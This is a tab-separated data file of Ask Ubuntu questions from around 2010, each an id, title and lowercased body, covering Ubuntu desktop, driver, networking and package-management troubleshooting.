4851	dell studio xps 16 overheats	since i have switched from win 7 to ubuntu , it seems my laptop is much hotter and the fan is much louder . is it normal behavior or maybe can i fix this by tweaking some settings ? if so , what would be the steps to troubleshoot the problem ? here is the output for `` sensors '' in the command line : olalonde @ olalonde : ~ $ sensors acpitz-virtual-0 adapter : virtual device temp1 : +56.0°c ( crit = +100.0°c ) temp2 : +53.0°c ( crit = +100.0°c ) temp3 : +65.0°c ( crit = +100.0°c ) update : i got a dell studio xps 16 which is known for overheating , but after 1 year on windows 7 , it was never as bad as it is on ubuntu . -computer- processor : 2x intel ( r ) core ( tm ) 2 duo cpu p8700 @ 2.53ghz memory : 4024mb ( 764mb used ) operating system : ubuntu 10.04.1 lts user name : olalonde ( oli ) date/time : tue 28 sep 2010 10:55:25 am edt -display- resolution : 1600x900 pixels opengl renderer : unknown x11 vendor : the x.org foundation -multimedia- audio adapter : hda-intel - hda intel audio adapter : hda-intel - hda ati hdmi -input devices- power button sleep button lid switch power button macintosh mouse button emulation at translated set 2 keyboard video bus dell wmi hotkeys laptop_integrated_webcam_2m synps/2 synaptics touchpad hda digital pcbeep hda intel mic at ext left jack hda intel hp out at ext left jack hda intel hp out at ext left jack hp-laserjet-p2015-series : < i > default < /i > -scsi disks- ata st9500420asg hl-dt-st dvdrwbd ca10n
4855	high pings on new internet provider	i am new to setting up routers and networks , so i am unsure . i still have everything to the factory settings . my net connection is quite slow , and seems unreasonably so even when connected with wired . though on wireless i get ping results like this : ping google.com ( 72.14.204.147 ) 56 ( 84 ) bytes of data . 64 bytes from iad04s01-in-f147.1e100.net ( 72.14.204.147 ) : icmp_seq=1 ttl=53 time=921 ms 64 bytes from iad04s01-in-f147.1e100.net ( 72.14.204.147 ) : icmp_seq=2 ttl=53 time=1024 ms 64 bytes from iad04s01-in-f147.1e100.net ( 72.14.204.147 ) : icmp_seq=3 ttl=53 time=1038 ms -- - google.com ping statistics -- - 4 packets transmitted , 3 received , 25 % packet loss , time 4047ms rtt min/avg/max/mdev = 921.235/994.828/1038.661/52.354 ms , pipe 2 i have verizon dsl if that matters . thanks for any help in advance ! ^_^
4858	is possible to make symlinks that 'follow ' the file ?	behavior : me @ local : tree . | -- ba | ` -- file.txt | -- foo | ` -- file.txt - > ba/file.txt ` -- foobar now , let 's say i move the file.txt from ba to foobar : me @ local : mv ba/file.txt foobar/file.txt i noticed that the symlink in foo folder still point the ba/file.txt path . there is a way to create symlinks that auto-update the paths when the source file is moved ? or symlinks that being deleted when i delete the source file ? will be great .
4868	what is the difference between upstream and downstream when referring to who to go to as a developer ?	what is the difference between upstream and downstream when referring to who ( or where ) to go to as a developer or packager ?
4872	bind software to different network interfaces	i have two different network interfaces , connected to 2 networks . one is an eth0 and the other one a wlan0 . how can i tell a software to use only a specific interface ? basically i want firefox to use eth0 because it is the university lan network and i have to go to intranet sites , the other one is a wifi network open to the internet and i want to bind it to chrome . i 'm working and i need to use intranet . so eth0 is my choice but eth0 is an intranet without internet access ( obviously ) . since i want internet access i 'm connected to wlan0 ( university wifi for students ) . the problem is if i have both connected sometimes the browser looks for www.stackoverflow.com using eth0 . so i wanted to assign a browser to use only a specific interface .
4873	nautilus icon view as default in a specific folder	i would like to set a few of my folders with a specified zoom level and set to icon view ( e.g . my ebook folder ) is there anyway to do this ?
4875	use my webcam with ubuntu running in virtualbox	i have ubuntu running in virtualbox . how can i make my in-built laptop camera work with it .
4876	can i minimize a window from the command line ?	i would like to be able to choose any already-open window and minimize it from the command line . is this possible ?
4879	what do the symbols in service -- status-all mean ?	i really miss the graphical `` services '' tool from older versions of ubuntu , but i understand why it had to go . i always have terminals open anyway , so i use ( because i have to now , i guess ) service -- status-all to see what services are running . this would be ok except that the command produces output like the following : [ + ] winbind [ ? ] wpa-ifupdown [ - ] x11-common i 'm guessing that those symbols mean something like listening , blocked , or stopped , but which is which ? more importantly , why does n't the man page say ?
4883	404 error when trying to update	last 14 days i am having problem in upgrading . each time when i attempt to upgrade , i get a message ( see attached image ) . please help me in solving this issue
4888	how to mark an option for install during burg install ( non-graphical install )	so when i tried installing burg it came to a screen to select which device to install burg on . i highlighted sda and hit enter and it just continued without installing it on that device . is there another key i need to select to mark that option ? btw , i 'm using the burg-manager to install it and when i try to emulate the burg menu it comes to this ... burg version 1.98+20100623-1 minimal bash-like line editing is supported . for the first word , tab lists possible command completions . anywhere else tab lists possible device or file completions . grub >
4898	drag forward installed python packages when upgrading	as somebody who runs multiple webservers each running a set of django sites , keeping on top of my python stack is very important . out of ( probably bad ) habit , i rely on ubuntu for a number of my python packages , including python-django and a lot of python-django-* extras . the websites require these to run but as long as the package still exists , this is n't an issue . i do this rather than using virtualenv ( et al ) because i want ubuntu to install security updates . however the ubuntu repos do n't cater for everybody . there are cases where i 'll use pip or easy_install to suck in the latest version of a python package . when you update python ( as occasionally happens in ubuntu ) , you lose all your pip-installed packages . what terrifies me is the deeper i get , the more servers i administer , there 's going to be an os update one day that requires hours and hours of my time running around , testing sites , reinstalling python packages through pip . the worst bit of this is potential downtime for client sites though i do test on my development machine ( always at ubuntu-latest ) so this should offset some of that worry . is there anything i can do to make sure updates to python mean the existing , non-dpgk 'd python packages are brought forward ? that would make sure i always had access to the same packages . i 'd still have to test for incompatibilities but it would be a good start . there 's perhaps one better solution : an application that behaved like apt and dpkg but for interacting with pypi ( where pip and easy_install get most of their mojo ) . something that stored a local list of installed packages , checked for updates like apt , managed installing , etc . does such a thing exist ? or is it a rubbish idea ?
4899	way ( s ) of browsing the filesystem that are more flexible	i have two related questions , both probably ( but not necessarily preferentially ) accepting the same answer : when browsing or exploring the filesystem in a gui , i want to be able to right click on the empty space between the files , choose a menu item and say 'open terminal in this folder , ' optionally as root do the converse when using the terminal , optionally as root i use universe with kubuntu but have debian lenny running with gnome installed separately , so anything on kde or gnome would work
4901	network not starting up on boot	basically my network wo n't start . ca n't use wired connections . to make it a further brain-scratcher , when booting into recovery , and using the network console , the network comes up and works . outside of recovery nothing . as far as i can tell no settings changed between powering off and on since last time it worked , except for an automatic kernel upgrade . using an older kernel does not seem to help . also this hardware configuration worked perfectly fine for over a year with kernel upgrades and all . network was always automatic . information for follow up questions ... network manager is running . strangely enough , my network interface was never started , nor was dhcp . where in the configuration can i find this ? to manually resolve the problem : sudo ifconfig eth0 up sudo /etc/dhclient what could have happened in my config to not make this work automatically . info gathered : > lspci | grep net > 6:00:19.0 ethernet controller : intel corporation 82566dm-2 gigabit network connection ( rev 02 ) contents of /etc/network/interfaces auto lo iface lo inet loopback after adding auto eth0 iface eth0 inet dhcp the eth0 interface comes up , but the dhclient does not . -- the problem re-occurred when waking up from sleep .
4902	medibuntu vs fluendo	can someone describe the difference between the codecs in the medibuntu repository versus buying the fluendo codecs ? are they the same ? does one have better quality etc ? my dell mini originally came with fluendo installed , but i have since upgraded several times and just used medibuntu - but i am wondering if i am missing something .
4905	how to automatically update burg after a kernel update	after every kernel update i have to run update-burg manually . how do i make it automatic ?
4910	how to create a remote aptitude/apt repository ?	i 've recently started administrating more ubuntu machines - as such i 've had to recompile/create packages for our configuration . on my redhat machines i was able to create a server that served as a yum repository - ensuring all my updates would be installed on the machines accordingly . is it possible for me to create an aptitude repository on a remote server ? if so how would one go about doing so ( and maintaining a custom/small set of packages on it - not just a mirror ) ?
4913	file properties ( notes ) not synced between local accounts	i started scanning personal documents recently and storing them in a folder in my account , now i 'm adding text , related to each document , on the notes tab of each document 's properties window . when i enabled this folder to be shared by my wife from her account , she can see the scanned documents , but not the notes themselves ; the tab appears empty . is there a way to enable sharing those notes ? i got to re-check if i enabled sharing correctly . should i place those document in a separate folder ; one not inside my own account ? is there an application that is better suited for this type of job ? some document management software ? some documents are in jpg while others are in pdf .
4917	mouse stuck after resumption from suspend	i 'm using ubuntu 10.04 on a gateway ta1 convertable tablet pc . after i suspend by closing the lid , and resume by reopening the lid , i can not use my trackpad mouse anymore . how can i fix this ? update : xinput -- list output ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ macintosh mouse button emulation id=11 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ power button id=7 [ slave keyboard ( 3 ) ] ↳ sleep button id=8 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=9 [ slave keyboard ( 3 ) ]
4919	clicking urls opens a new tab in firefox	i 'm running 10.04 , with firefox 3.6.x . i have noscript and adblock installed , as well as firebug and the gwt toolkit . the problem i 'm having is that sometimes urls open in new tabs even just with a normal click . i use my laptop 's built-in trackpad as a pointing device with 'tap to click ' enabled . this seems to happen between 10 and 25 % of the time . it 's quite annoying . anyone have any idea what causes this ?
4921	with xmarks closing down , what is a good alternative ?	i 'd like to keep my bookmarks synced between different browsers , computers , and operating systems . what 's the best browser plugin or other solution to keep my bookmarks synced between all of these ?
4922	what microblogging clients are available ?	what gui twitter clients are there for ubuntu ? please include reasons why you like - or highlight features that make a client unique . please also keep to one client per answer .
4923	disable screensaver while using hulu desktop	there is a file in your home folder that allows you to configure some settings for hulu desktop : ~/.huludesktop . it has an option for scripts to run to dis/en-able the screensaver . i would like to write a script to be called by hulu while watching video . it seems that in ubuntu 10.04 the gconftool settings idle_activation_enabled & idle_activation_enabled no longer inhibit the gnome-screensaver or monitor sleep . these are the commands i tried to use : gconftool-2 -- set /apps/gnome-screensaver/idle_activation_enabled -- type bool true gconftool-2 -- set /apps/gnome-powermanager/idle_activation_enabled -- type bool true i have also found gnome-screensaver-command with the -- inhibit option , but that blocks while active which means that my suspend script would be hard to fit into the two .huludesktop options ( suspend_script & resume_script ) i would prefer not to use caffine as this is under ubuntu nbr and top panel space is valuable .
4926	can i auto-scroll when opening a folder ?	when i open a folder in the tree pane , i want to display the sub-folders , and am likely to want to see all of them . i often then want to open a sub-folder and view the folders within that . what often happens is that part of the list of sub-folders is displayed . i scroll so i can see them all , select one , and then have to scroll to see all of them ... is there a way to configure nautilus so that the folder display is scrolled when i open a sub-folder , to enable me to see all the sub-folders - or at least , the first screen of them ?
4933	tool to convert pdf file into separate html files ?	i 'm looking for a tool that will convert the pages of a pdf file to html files . i just need the text and formatting - i do n't care about images and other media .
4934	hp laserjet printer does n't have 2 sided option	when i want to print something , i do n't get the option to print on both sides of a paper although my printer supports this feature . how can i fix this ? do i have to download a proprietary driver ? my printer is a hp laserjet p2015n .
4935	gnome exits unexpectedly	here 's the situation : since i upgraded to 10.4 lts , my gnome session unexpectedly ends : it logs off . this does not happen every time , but rather randomly . i 've tried to force this event , suspecting it was some kind of unfortunate key-mapping thing : alt-enter , shift-enter , enter-end , etc . but no , i cant reproduce it . does this happen to anyone ? i 've googled around , but have n't found any solution . update : here 's the last part of my .xsession-errors file error 0 ( success ) on x server :1.0. error 0 ( success ) on x server :1.0. > madplug-message : rejecting > file : ///media/kingston/somesong.mp3 : > out of data . > > ** ( update-notifier:3110 ) : debug : fire up the crashreport tool > > gnome-session : fatal io error 11 > ( resource temporarily unavailable ) on > x server :1.0 . > > gnome-settings-daemon : fatal io error > 11 ( resource temporarily unavailable ) > on x server :1.0 . > > window manager warning : fatal io error > 11 ( resource temporarily unavailable ) > on display ':1.0 ' . > > gnome-screensaver : fatal io error 11 > ( resource temporarily unavailable ) on > x server :1.0 . > > polkit-gnome-authentication-agent-1 : > fatal io error 11 ( resource > temporarily unavailable ) on x server > :1.0 . > > evolution-alarm-notify : fatal io error > 11 ( resource temporarily unavailable ) > on x server :1.0 . > > tilda : fatal io error 11 ( resource > temporarily unavailable ) on x server > :1.0 . > > audacious2 : fatal io error 11 > ( resource temporarily unavailable ) on > x server :1.0 . > > xio : fatal io error 11 ( resource > temporarily unavailable ) on x server > `` :1.0 '' ^m > > after 9917 requests ( 9916 known processed ) with 0 events remaining.^m > gsd-locate-pointer : fatal io error 11 > ( resource temporarily unavailable ) on > x server :1.0 . > > gnome-terminal : fatal io error 11 > ( resource temporarily unavailable ) on > x server :1.0 . > > > gdu-notification-daemon : fatal io > error 11 ( resource temporarily > unavailable ) on x server :1.0 . > > update-notifier : fatal io error 11 > ( resource temporarily unavailable ) on > x server :1.0. nm-applet : fatal io > error 0 ( success ) on x server :1.0.error 0 ( success ) on x server :1.0 . thanks in advance.error 0 ( success ) on x server :1.0 .
4940	installing server on unsupported areca raid controller	i just got a new server that has a brand new areca 1880 raid controller which the built in arcmsr module does not support . areca has updated module source code available on the cd that came with the controller and their website . using this i was able to install ubuntu server on the hardware by using my laptop to build the kernel module and loading it off a usb stick . i then built the driver for the server kernel and updated initrd but when i reboot it does n't even look like grub is getting loaded . the only thing the system does is display a `` _ '' in the upper left of the screen . i believe i 'm seeing a grub issue but combined with the raid controller/module issues i 'm not 100 % positive on that . does anyone know of any limitations with areca controllers and grub ? one weird hurdle that i ran across is that the server install cd uses the desktop kernel rather than the server kernel so you need to build the module twice .
4942	remove the anchor icon in docky	can i remove the anchor icon from my docky dock ?
4945	gnome-power-manager is running while trying to log in . how to get rid of it ?	after booting into the ubuntu login screen and clicking on my user name and entering the password , i get a dialog stating that gnome-power-manager is still running . the dialog presents 2 buttons , 1 to cancel and other to logout anyway . this issue happens about 50 % of the time and i do n't remember doing anything related to power management recently . also , even if i do n't choose any option in the dialog it goes away after about 30s . this is happening on a desktop machine as well as a laptop . on the laptop i have configured power management for myself ( not for gdm ) whereas in desktop i have not configured power management for any user . this is only an annoyance but still i would like to fix it , especially on my desktop where i am interested in getting it auto-login asap into my userid . any ideas why this could be happenning ?
4947	how can i change resolution of `` my video '' in skype ?	i have a logitech quickcam pro 9000 connected to my ubuntu desktop and it works fine with skype . however , skype inputs and sends my video at the native ( for the webcam i think ) resolution of 1600 x 1200 . i can confirm that the camera supports a wide variety of resolutions starting from 160 x 120 upto 1600 x 1200 ( including e.g. , 320 x 240 , 352 x 288 ) using cheese . i can select these resolutions and see the output is appropriately scaled . also , i do n't see any improvements in smoothness of motion in the captured video so i suspect the original 1600 x 1200 is scaled down in the path somewhere . is it possible to somehow to enable this scaling capability towards skype ?
4950	how to stop using built-in home directory encryption ?	i have a new ubuntu 10.04 installation with encrypted home directory ( using the built-in encryption offered by ubuntu installer ) . what 's the easiest way to stop using encryption ? ( i.e. , to decrypt my home directory permanently . ) ( it 's giving me problems with kernel updates , and i 'd just like to cut down on all the hassle i 'm having with this installation . )
4954	how to get nvidia geforce gt 210 drivers working on lucid lynx ?	i have a workstation with nvidia geforce gt 210 graphics card & ubuntu 10.4 , and am having rather annoying problems trying to get them working together . ( on other machines and earlier ubuntu versions i 've been a pretty happy nvidia user though . ) first of all , simply using the nvidia driver automatically suggested by `` adminstration - > hardware drivers '' did n't work at all . based on this answer , i tried with drivers straight from nvidia , and got it working for a while . but now ( perhaps due to reboot , or apt-get upgrade ) i 'm out of luck again . there now seems to be a conflict with the nouveau driver . i 've tried removing it : apt-get -- purge remove xserver-xorg-video-nouveau ( as suggested here ) and reboot i 've also tried modprobe -r nouveau but it gives fatal : module nouveau is in use . but when trying to ( re- ) execute nvidia 's installer ( nvidia-linux-x86_64-256.53.run ) it keeps complaining about nouveau . i 'm starting to run out of ideas , so any help would be welcome !
4958	esi esu 1808 soundcard support	i need to know if the esi esu 1808 soundcard will work on my ubuntu , before i buy it . i 've tried to google some answer , but could not find anything relevant .
4959	how can i install the safari web browser ?	i want to install the apple safari browser on my ubuntu 10.04 machine in order to test the latest html5 and css3 features of the browser . i believe it is possible to use wine for this but i want to know which version wine should be used and which version of windows i should emulate . will wine be able to support all the css3 animations or should i install winetricks ?
4964	unable to connect to mobile broadband : huawei ec1260 - tata photon+	i have a tata photon+ ( huawei ec1260 ) mobile broadband device and am unable to establish a connection either using wvdial or the network manager . here is my wvdial.conf [ dialer defaults ] init1 = atz init2 = atq0 v1 e1 s0=0 & c1 & d2 +fclass=0 stupid mode = 1 modem type = analog modem isdn = 0 phone = # 777 modem = /dev/ttyusb0 username = internet password = internet baud = 9600 and here some info from /var/log/messages sep 30 15:45:27 owais-laptop kernel : [ 3130.499111 ] usb 6-1 : gsm modem ( 1-port ) converter now attached to ttyusb2 sep 30 15:45:27 owais-laptop kernel : [ 3130.509143 ] scsi44 : usb-storage 6-1:1.3 sep 30 15:45:28 owais-laptop kernel : [ 3131.517057 ] scsi 44:0:0:0 : cd-rom huawei mass storage 2.31 pq : 0 ansi : 0 sep 30 15:45:28 owais-laptop kernel : [ 3131.519980 ] scsi 44:0:0:1 : direct-access huawei sd storage 2.31 pq : 0 ansi : 2 sep 30 15:45:28 owais-laptop usb_modeswitch : switched to 12d1:140b ( hua每wei technologies : huawei mobile ) sep 30 15:45:28 owais-laptop kernel : [ 3131.548883 ] sr1 : scsi-1 drive sep 30 15:45:28 owais-laptop kernel : [ 3131.549148 ] sr 44:0:0:0 : attached scsi generic sg2 type 5 sep 30 15:45:28 owais-laptop kernel : [ 3131.550627 ] sd 44:0:0:1 : attached scsi generic sg3 type 0 sep 30 15:45:28 owais-laptop kernel : [ 3131.591897 ] sd 44:0:0:1 : [ sdb ] attached scsi removable disk sep 30 15:47:31 owais-laptop pppd [ 22151 ] : pppd 2.4.5 started by root , uid 0 sep 30 15:47:31 owais-laptop pppd [ 22151 ] : using interface ppp0 sep 30 15:47:31 owais-laptop pppd [ 22151 ] : connect : ppp0 < -- > /dev/ttyusb0 sep 30 15:48:01 owais-laptop pppd [ 22151 ] : lcp : timeout sending config-requests sep 30 15:48:01 owais-laptop pppd [ 22151 ] : connection terminated . sep 30 15:48:01 owais-laptop pppd [ 22151 ] : receive serial link is not 8-bit clean : sep 30 15:48:01 owais-laptop pppd [ 22151 ] : problem : all had bit 7 set to 0 sep 30 15:48:01 owais-laptop pppd [ 22151 ] : modem hangup sep 30 15:48:01 owais-laptop pppd [ 22151 ] : exit . is this a network problem or device problem ?
4967	what 's the best way to get python 2.5 and 2.7	ubuntu 10.04 has only two supported python versions 2.6 and 3.1 . developers often need more , to test that their python code works on 2.7 , 2.5 ( and maybe even 2.4 and older ones ) . what 's the best way to install those python versions side-by-side on a lucid system ? is it felix krull 's ppa , which i 'm currently using ? incidentally , some important packages are n't available in those non-standard pythons from the deadsnakes ppa : python-setuptools ( but you can install python-setuptools-deadsnakes ) python-profiler
4977	keyboard layout switching unvoluntarily when opening new application	i use three different keyboard layouts , usa , can and rus . my default layout is usa . i have set the keyboard layout to be system-wide instead of application specific because it allows me to keep track of only one status . however , whenever i open a new application , the system-wide layout is always reset to the default layout . for example , if my layout was set to can and i opened vlc , the layout would then switch back to usa for the whole system . i do n't quite understand how or why this could be a desirable behavior ... do you have any idea as how to get rid of this ? if not , where can i open up a feature request ? edit : i did some more testing and in fact , the behavior seems inconsistent . sometimes the layout will switch , sometimes it wo n't . i ca n't pinpoint what is the exact source of the issue . edit2 : i think some applications do it , some do n't . ex : vlc does it , gedit does n't .
4978	how can i rebroadcast an audio stream ?	my wife and i both like to listen to the same online audio stream . that means we end up with multiple computers connecting to the same online stream at the same time . it would be helpful if i could save on internet bandwidth by connecting to the internet stream on one computer/server and `` rebroadcasting '' it so that it 's available to other computers in my house . any suggestions ?
4980	how do i change my monitor 's resolution when using a kvm ?	i 'm using 10.04 behind a kvm switch . the kvm is old and does n't pass ddc through , so when the box boots up it just assumes i ca n't handle anything beyond 800x600 . apparently the xorg.conf is ignored , so i ca n't just hack monitor data directly into that . is there a way to tell the box what my monitor is that will persist across reboots ?
4983	what are ppas and how do i use them ?	i keep reading about personal package archives ( 'ppas ' ) and people answer questions with a link to a ppa . what 's the best way to use these ? there are multiple valid answers for this question spanning over several versions of ubuntu . for your convenience , an index of each is below . ubuntu 11.04 and newer ubuntu 10.10 ubuntu 10.04 command line what is a ppa ? removing a ppa
4985	why does the xforcevesa command throw me onto the command line ?	hey all . i 've suffered a major problem with my laptop over the last release or so ; which is solved by appending xforcevesa to the boot options . however , in 10.10 , instead of putting me onto low graphics mode , it instead puts me onto the command line . help !
4988	2 network interfaces connected to internet . choose the one to use according to the domain name	question inspired from here scenario i live in a house near my university . that said , students wifi can reach my home so i usually use that even from home . the problem is , being a wifi managed by university sysadmins , it 's not possible to connect to some dns ( e.g . file uploading domains like rapidshare or megaupload ) . the good news is i also have an usb internet key that i can use , but , basically that 's a scam like all internet mobile plans in italy because after 20gb they 'll cut off my bandwith . finally ... the question to optimize my bandwith usage i want to say to my ubuntu : if i connect to *.domain.com use this interface , otherwise use the other one . for the sake of this question let 's call wifi wlan0 and usb internet key ppp0 . p.s . : it 's a really specific question . do not suggest things like `` use tor , dude '' . i do not want to abuse the university wifi . i actually do n't know if that is even possibile with tor ... but still ... : )
4989	reset gnome font configuration ?	how do i reset the font settings - actual font and size - to their default ? ( i changed some values in system- > preferences- > appearance- > fonts ) this is particularly important with the new ubuntu font in maverick - for instance i 'm interested to see what the default settings are .
5007	how do i fix current pending sector count	from the smart data , it shows that i have 3 pending sector counts . ( running ubuntu maverick . ) i tried following a forums link regarding how to solve that , but i 'm not able to identify the exact sector count to write to that sector . i'v run the full self test from the disk utility , but the disk utility does not show the exact sector number in maverick , not sure about earlier versions though . has this changed in maverick ? how do i identify the sector and fix that pending count ? is that tip in the forums safe ? ps : i do have other issues with `` reallocated sector count '' , from what i'v googled , its not fixable.. is there any way to prevent it from rising ?
5013	sync calendar and contacts with android smartphone	i use thunderbird with lighting calendar addon , which stores calendar data in icalendar format . how can i synchronize this calendar and thunderbird contacts with android based smartphone ( htc wildfire ) . i know i can use google account , but i 'd prefer to use bluetooth or even better , local access via wi-fi ( no internet connection available ) . is there any complete ubuntu smartphone synchronization guide somewhere ?
5015	once i attach a second display , when i then start my laptop without it , mouse cursor is invisible ( but works ) . how to fix ?	once i use an external crt display ( explicitly disabling it before shutting down does not help ) with my laptop , then when i next start my laptop without any external display attached , mouse cursor is invisible ( but works , i still can click buttons , but ca n't track where the cursor is now ) . how to fix this ? i use ubuntu ( classic gnome version ) 10.10 on toshiba l10 with intel 82852/855gm graphics . when i was using arch linux with xfce , there used to be the same problem . i 've tried disabling metacity 's ( and xfwm in past ) composition , explicitly disabling external monitor , changing mouse cursor , updating drivers several times , nothing seems to help , i always have to have an external monitor attached ( i may disable it , but it has to be attached ) at boot time if i want to see my mouse cursor .
5017	way to automatically resize 2 windows to take up half of the screen	i am trying to figure out if it 's possible to do the following ( or rather bind this action to a hot key ) : if on a workspace i have 2 windows , i want to maximize each one vertically and resize them horizontally to be half of the screen each and position them next to each other . basically after this operation there should 2 equally sized windows , taking up all space . if that 's not possible with default gnome , how can i write up a python script to do that ( i.e . where can i start ? never did ui scripting with python before ... )
5018	is it possible to `` upgrade '' from a 32bit to a 64bit installation ?	as per title , i wish to know if i can , after a successful 32bit setup and consequent software installations , update to a 64bit version . i know how to partition ( actually one of the solutions is to set / , /etc , /home , /var/www , and /opt as separate partitions ) and i know that a clean install is way better than a dirty one , yet i would like to know if/how it 's possible to do that .
5027	how can i easily use the gcc compiler for arm for building in a development ide ?	i would like to replace the non-open lpcxpresso ide with a free ide . any pointers how to do it best ? how can i point one of the existing ides to use the arm gcc compiler ?
5030	disk very slow after going from 9.04 to 10.04	my disk is very slow after i installed ubuntu 10.04 over my old 9.04 . doing some tinkering helped a little : sudo hdparm -tt /dev/sda1 /dev/sda1 : timing cached reads : 3668 mb in 2.00 seconds = 1834.11 mb/sec timing buffered disk reads : 292 mb in 3.02 seconds = 96.83 mb/sec sudo hdparm -c1 -d1 -x 66 /dev/sda1 /dev/sda1 : setting 32-bit io_support flag to 1 hdio_set_32bit failed : invalid argument setting using_dma to 1 ( on ) hdio_set_dma failed : inappropriate ioctl for device setting xfermode to 66 ( ultradma mode2 ) hdio_drive_cmd ( setxfermode ) failed : invalid exchange io_support = 0 ( default ) hdio_get_dma failed : inappropriate ioctl for device sudo hdparm -tt /dev/sda1 /dev/sda1 : timing cached reads : 4006 mb in 2.00 seconds = 2003.29 mb/sec timing buffered disk reads : 312 mb in 3.02 seconds = 103.41 mb/sec but it is still far too slow . on the other version , i had a custom partition setup , with the home partition with 100gb , and ext3 ( and other partitions for swap , boot , root folder and space for a windows partition i never cared to install ) . this time i am using a standard lynx setup ( 2 partitions , the swap and the main one with almost 250gb , using ext4 ) . some applications i develop , that use disk for some unit tests , are now very slow to work with . is there a way to making it faster ? going back to 9.04 ? waiting for 10,10 ? gparting and making partitions smaller on ext3 ? i do n't know if any of these will work ... .
5031	what if i run a virus/trojan windows exe on ubuntu with wine ?	i 've got a file said to contain information i was looking for . unfortunately it is an executable instead of doc ( as it was meant to be ) and the site i 've download it from looks suspicious for me . if i was not using linux , i 'd run it on a vm or a separate pc . but running linux , do i need to worry , or can i just run it with wine ? can wine system be infected ?
5032	wireless card worked on 8.04 , failed on 10.04 , only works slightly on static ip	i have a laptop that someone gave me and it came with a pcmcia card for the wireless connection . it is a d-link wireless wna-1330 pcmcia card . when i installed ubuntu 8.04 , the wireless connectivity worked just fine without issue to my dsl router ( that has a dhcp server on it ) . i was able to connect to the dsl router and surf the web . i then ran the upgrade process to 10.04 in the package/update manager . after the upgrade , the wireless card ceased to work . it would light up like it should , and it would see the network of wireless dsl routers in my neighborhood , but not let me connect with the wep key . when i checked the logs , i found it was timing out in trying to get an ip address for some reason . so , i read that i should set it to a static ip . i set it to a static ip address and then it connected properly to the wireless router . the dsl router 's network page also showed the connection . but then when i tried to surf the web , it would n't work . i tried pinging multiple hosts and all i could do was ping the dsl router 192.168.1.1 . i also had packet loss when pinging that router . so , i changed the config to use google 's public dns ( 8.8.8.8 ) and reconnected the wireless . this time , i could ping multiple sites on the web ( with some packet loss ) but could not browse them with the web browser . as well , i still can not browse my router 's management page on 192.168.1.1 . what do you think is going on ?
5033	why is mainstream ubuntu still i386-compiled ?	i pretty much believe ( am i wrong ? ) that over 90 % ( if not over 99.9 % ) of ubuntu 10.x i386 installations are run on i686 computers . so why is ubuntu still not i686-optimized ? the only case i can imagine , when one 's install modern ubuntu on i386 machine is a low-end netbook on something like geode cpu . so , if canonical guys would like to support those , then why not to leave `` netbook remix '' i386 and make mainstream desktop ubuntu i686 ?
5036	what are the differences between regular processes and services ?	what are the differences between regular processes ( like firefox , gimp , skype , etc . ) and services ( httpd , mysqld , etc. ) ? obviously , services are different in their function , but i 'm really wondering what 's going on under the hood at the os level ? are they treated in any different way ?
5037	magix export project to avi	the whole day i struggled hard for a presentation of a video that i need it for tomorrow . when i am trying to export that project to avi format , its throwing me an error message stating : during export with an external codec , an error has occured . please check and adjust the export settings ... how can i overcome this ?
5039	what is the difference between /etc/init/ and /etc/init.d/ ?	what is the difference between /etc/init/ and /etc/init.d/ ? more generally , what meaning does the `` .d '' suffix convey to a directory ?
5041	anybody know what happened to gmplayer in maverick ?	my long-term media player ( for various reasons ) has been gmplayer . a simple floating ui that remembered its fullscreen layout and just worked for me . i 'm not trying to convert anybody but please respect that i 'm not looking for alternatives . it used to live in a package called mplayer-gui . since upgrading to maverick , i ca n't find it anywhere . apparently an ubuntu-sent changelog says i should use smplayer instead but as anybody who has used both will tell you immediately , they 're completely different styles of media player . i 'm not against progress but i ca n't see anything but regression here .
5048	ubuntu vpn using sonicwall	the only thing keeping me from blowing away the crappy vista install on my toshiba laptop and going pure ubuntu is the fact that i need to vpn to work and they use sonicwall . due to some proprietary voodoo used by that particular firewall setup on my work 's end , i have to use the sonicwall client which only runs on windows . has anyone found a way to vpn to a sonicwall connection from ubuntu ?
5051	how to switch off caching for usb device when writing to it ?	i have problems transferring binary programs to a micro-controller prototype board when using ubuntu/kubuntu to mount the board via usb . with macos and windows there are no problems . i have found the writing from ubuntu definitely changes the written file . i suspect that the write caching is the problem . how can i disable it , or what else might be the problem .
5052	graphics card problems after update	during the week i did a update through the update manager and since then my desktop graphics have stopped working properly . i usually just quickly glance through the list of packages to be updated before pressing install and this time i notice that a component called fglrx was going to be updated . i can only speculate that this has anything to do with it . i chose to update ... after the update i did a reboot and that 's when the trouble began . my system was unable to boot into high resolution mode and gave me the option to boot into low graphics mode or reconfigure . i tried the reconfigure option but it did n't do anything and after i fiddled around a bit i was able to get back to a low-res desktop . the first thing i tried was sudo dpkg-reconfigure xserver-xorg but this seem to do nothing . it just dropped me back to the command-line without a message . then i checked if my hardware drivers where still enabled so i opened system / administration / hardware drivers panel and after searching for available drivers it came up with an empty list . i decided to downloaded the latest ati x86_64 drivers and did an install of those . installation was successful and i did a reboot . i 'm currently in high-res mode but i do n't seem to have any hardware acceleration . dragging a window around the desktop is a painful process to watch . there is an aticonfig command line utility that outputs about 50 zillion options . i 'm pretty sure there used to be a graphical ui version of it but i ca n't seem to find it anywhere in my applications menu . when i issue the following command : fglrxinfo i get the following output : x error of failed request : badrequest ( invalid request code or no such operation ) major opcode of failed request : 136 ( glx ) minor opcode of failed request : 19 ( x_glxqueryserverstring ) serial number of failed request : 15 current serial number in output stream : 15 i 'm on ubuntu 9.10 and i have an ati radeon 5450 video card . any help would be greatly appreciated .
5055	is it possible to hide the `` copy to '' and `` move to '' context menus ?	i 've just read this question and realized that i had never used either the `` copy to '' or `` move to '' context menu - is it possible to hide them ?
5057	how to change the order of the ok/cancel buttons ?	i 'm new in ubuntu . so far , i used only the windows . in ubuntu , irritates me the order of buttons ok / cancel . in the windows ok button is the first and then cancel button . in ubuntu it is vice versa . how do i change it ? what should i do that at all dialogs was the sequence : ok / cancel ?
